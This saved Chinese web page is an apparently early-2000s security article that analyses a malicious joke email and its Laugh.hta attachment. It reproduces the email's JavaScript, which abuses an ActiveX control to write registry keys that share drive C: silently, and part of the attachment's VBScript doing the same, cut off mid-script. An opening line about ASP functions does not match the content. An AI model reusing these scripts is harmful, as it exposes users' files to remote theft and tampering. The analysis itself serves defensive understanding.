不明邮件是如何共享你的硬盘的.htm

较为详细的介绍了asp自定义的各种函数,方便asp的各种开发.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0060)http://www.ylstudy.net/newhand/detail_newhand.asp?new_id=109 -->
<HTML><HEAD><TITLE>不明邮件是如何共享你的硬盘的</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type><LINK 
href="不明件是如何共享你的硬的.files/study.css" rel=stylesheet type=text/css>
<SCRIPT language=JavaScript src="不明件是如何共享你的硬的.files/font_color_set.js"></SCRIPT>

<META content="MSHTML 5.00.2919.6307" name=GENERATOR></HEAD>
<BODY bgColor=#a0a0a0 >
<DIV align=center>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="97%">
  <TBODY>
  <TR>
    <TD><FONT color=#ffffff>自定义阅读：
      <SCRIPT language=JavaScript 
      src="不明件是如何共享你的硬的.files/fc_set_option.js"></SCRIPT>
      </FONT> </TD></TR></TBODY></TABLE>
<TABLE bgColor=#ffffff border=1 borderColorDark=#993300 borderColorLight=#993300 
cellPadding=0 cellSpacing=0 style="BORDER-COLLAPSE: collapse" width="97%">
  <TBODY>
  <TR>
    <TD align=middle>
      <TABLE border=0 cellPadding=0 cellSpacing=0 width="97%">
        <TBODY>
        <TR>
          <TD align=middle colSpan=4><BR><FONT color=#ff0000 
            size=3><B>不明邮件是如何共享你的硬盘的</B></FONT> </TD></TR>
        <TR>
          <TD colSpan=3><BR>&nbsp;&nbsp;关键字：<FONT 
            color=#ee0088>(邮件,共享,安全漏洞)</FONT> </TD>
          <TD align=right vAlign=bottom><FONT color=#993399>评分：</FONT> <FONT 
            color=#ff0000>15</FONT>分 / <FONT color=#0000ff>4</FONT>人&nbsp;&nbsp; 
          </TD></TR>
        <TR>
          <TD align=middle colSpan=4>
            <HR color=#000000 width="97%" height="1">
          </TD></TR>
        <TR>
          <TD colSpan=4 
            id=thetd>最近网络上的邮件病毒满天飞舞，令人防不胜防。小弟的邮箱地址也不知怎么被添加到几份邮件列表中，结果现在平均下来收10封信有8封垃圾邮件。不光是广告，而且最近常有一些不明身份的邮件发到我的邮箱来，并且都带有附件，通常附件为doc和exe文件。可恶！看来不是SirCam病毒就是“求职信”病毒。Foxmail的过滤器也是杯水车薪——Spammer每天都从新的原地址发来垃圾邮件。每天收信都战战兢兢，就像 
            <BR>是在排雷！ 
            <BR><BR>　　忽一日，好友打电话来求救，说机器不能启动了。我一听，就拿着工具软件一路小跑到他家，也不多问——直接开机（好友刚学电脑不久，水平肯定……），一看“缺少系统文件”，这简单，启动盘启动，“Sys 
            A: C: 
            ”搞定！重启，蓝天白云映入眼帘……“可能是有病毒吧，要不然系统文件会无故丢失？”我一边说一边操起鼠标。“怎么启动速度这么慢？”我问他，他摇摇头后说“昨天收了信后就成这样了，我也不知道怎么回事。”我打开Outlook 
            Express，发现有封名为“笑林广记笑话集”的信不能读，OE提示说上一次没有正常退出，可能是由看过的最后一封邮件所引起的。我就点击“查看此邮件”，里面有一个名为Laugh.hta的附件，我试着一执行，结果硬盘灯狂闪。不对头！我立即按下三键，在任务列表中没有发现邮件病毒常见的WScript进程，倒是多了一个MSHTA的不明进程。这个进程肯定有问题，马上用“Windows优化大师”中的进程管理器杀掉了它——果然，硬盘不响了。 
            <BR><BR>　　朋友说他也点过这个附件。我就打开资源管理器，首先发现C盘的盘符上有一只手托着——C盘被共享了！莫名其妙，马上改为不共享。接着又发现C盘根目录下的Io.sys大小不对——由219K变成了3K，又被病毒写坏了！我这回得好好研究你一下！再打开OE，不理会OE的关于上一次没有正常退出提示，直接双击该可疑邮件，点击菜单上的“查看”——“编辑源文件”，终于看到了它的庐山真面目。 
            <BR><BR>〈!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 
            Transitional//EN"〉 <BR>〈HTML〉〈HEAD〉 <BR>〈META content="text/html; 
            charset=gb2312" http-equiv=Content-Type〉 <BR>〈META content="MSHTML 
            5.00.2614.3500" name=GENERATOR〉 <BR>〈STYLE〉〈/STYLE〉 <BR>〈/HEAD〉 
            <BR>〈BODY bgColor=#c0c0c0〉 <BR>〈DIV align=center〉〈FONT 
            size=4〉〈STRONG〉笑林广记笑话集〈/STRONG〉〈/FONT〉〈/DIV〉 <BR>〈DIV align=center〉 
            〈/DIV〉 <BR>〈DIV align=left〉〈FONT size=2〉 
            <BR>你好！我们是笑林广记笑话网，这里有大量的XXX级笑话，绝对笑死你！欢迎访问！附件中有极品笑话N篇，友情赠送！〈A 
            href="http://www.sexlaugh.com.cn"〉Http://www.sexlaugh.com.cn〈/A〉〈/FONT〉〈/DIV〉 
            <BR>〈script language=JavaScript〉 <BR>function f（）　//改写注册表的函数 <BR>{ 
            <BR>var aa,ss; <BR>aa=document.applets[0]; 
            <BR>aa.setCLSID（"{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"）; 
            <BR>aa.createInstance（）; <BR>ss=aa.GetObject（）; 
            <BR>ss.RegWrite（"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network\\LanMan\\C$\\Flags",302,"REG_DWORD"）; 
            <BR>ss.RegWrite（"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network\\LanMan\\C$\\Type",0,"REG_DWORD"）; 
            <BR>ss.RegWrite（"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network\\LanMan\\C$\\Path","C:\\"）; 
            <BR>} <BR>function init（） <BR>{ <BR>setTimeout（"f（）", 
            1000）;　//每过1000毫秒就再次递归调用f（） <BR>} <BR>init（）;　//调用函数 <BR>〈/script〉 
            <BR>〈/BODY〉〈/HTML〉 
            <BR><BR>　　这封邮件就是利用了MS.ActiveX元件的写注册表的功能，只要你一读这封信，它就会在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionNetwork\LanMan中添加了一个键值C$，并且将C盘改为完全共享！这样黑客可以用SMB扫描器直接登陆你的C盘，他可以在硬盘中随意拷贝文件，删除文件，添加文件……并且可以给你上传木马，永久而全面地控制你的机器。 
            <BR><BR>再来看一看附件Laugh.hta吧。我查看了一下“文件类型”，发现“.hta”后缀名其实是HTML 
            Application文件，可以由Mshta.exe解释执行。看来也是和WSH、VBS一样的文本文件，就将它导出为Txt文件——哈哈！全看到了！ 
            <BR><BR>〈html〉 <BR>〈script language=vbs〉 <BR>On Error Resume 
            Next·　容错语句，避免程序崩溃 <BR>set 
            aa=CreateObject（"WScript.Shell"）·建立WScript对象 <BR>Set fs = 
            CreateObject（"Scripting.FileSystemObject"）·建立文件系统对象 <BR>Set dir1 = 
            fs.GetSpecialFolder（0）·得到Windows路径 <BR>Set dir2 = 
            fs.GetSpecialFolder（1）·得到System路径 <BR>dir1=dir1+"\START 
            MENU\PROGRAMS\启动" 
            <BR>aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetwork\LanMan\S$\Flags",302,"REG_DWORD"·写入Dword值Flags，这是共享类型的标志